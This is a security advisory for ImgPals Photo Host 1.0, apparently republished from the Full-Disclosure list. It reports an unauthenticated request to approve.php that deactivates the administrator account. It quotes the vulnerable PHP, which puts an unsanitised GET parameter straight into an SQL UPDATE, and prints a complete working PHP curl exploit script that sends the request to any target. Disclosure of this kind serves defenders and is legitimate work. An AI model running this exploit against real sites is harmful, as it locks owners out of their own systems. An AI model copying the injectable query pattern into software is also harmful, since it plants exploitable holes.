ImgPals Photo Host 1.0 Stable Admin Account Deactivation

2012-02-29 / 2012-09-17
Credit: Corrado Liotta Aka CorryL
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2012-4925 | CVE-2012-4926
CWE: N/A

-=[--------------------ADVISORY-------------------]=- ImgPals Photo Host Version 1.0 STABLE Author: Corrado Liotta Aka CorryL [corryl80@gmail.com] -=[-----------------------------------------------]=- -=[+] Application: ImgPals Photo Host -=[+] Version: 1.0 STABLE -=[+] Vendor's URL: http://www.imgpals.com/forum/ -=[+] Platform: Windows\Linux\Unix -=[+] Bug type: Admin Account Disactivation -=[+] Exploitation: Remote -=[-] -=[+] Author: Corrado Liotta Aka CorryL ~ corryl80[at]gmail[dot]com ~ -=[+] Facebook: https://www.facebook.com/CorryL -=[+] Twitter: https://twitter.com/#!/CorradoLiotta -=[+] Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611 ...::[ Descriprion ]::.. I released the ImgPals Photo Host Version 1.0 STABLE Features Include: * Easy Install * Full README file included * Full Control Panel to control your site * User Side Features o Multiple JQuery Uploads o Create and Edit Photo Albums o Make Albums Public or Private o Describe Albums and Photos o Move, Delete, Rename, Rotate, Rate, Comment, and Tag Photos o Add Friends o Chat with Friends o Update people with status wall posting o Manage Profile o Profile Avatar Uploads o Private Messaging * And much more, be sure to check out the Demo ...::[ Bug ]::.. A attaker can remotely disable the account from administratore not allowing the same to be able to access the site ...::[ Proof Of Concept ]::.. if ($_GET['a'] == 'app0'){ $sqlapprove = mysql_query("UPDATE members SET approved = '0' WHERE id = '".$_GET['u']."'"); by sending the command approve.php? u = a = 1 & app0 a attaker can disable the Administrator account. ...::[ Exploit ]::.. #!/usr/bin/php -f <?php //Coded by Corrado Liotta For educational purpose only //use php exploit.php server app0 or app1 //use app0 for admin account off //use app1 for admin account on $target = $argv[1]; $power = $argv[2] $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_URL, "http://$target/approve.php?u=1&a=$power"); curl_setopt($ch, CURLOPT_HTTPGET, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); curl_setopt($ch, CURLOPT_TIMEOUT, 3); curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3); curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3); curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target"); $buf = curl_exec ($ch); curl_close($ch); unset($ch); echo $buf; ?> _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

References:

http://it.linkedin.com/pub/corrado-liotta/21/1a8/611


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top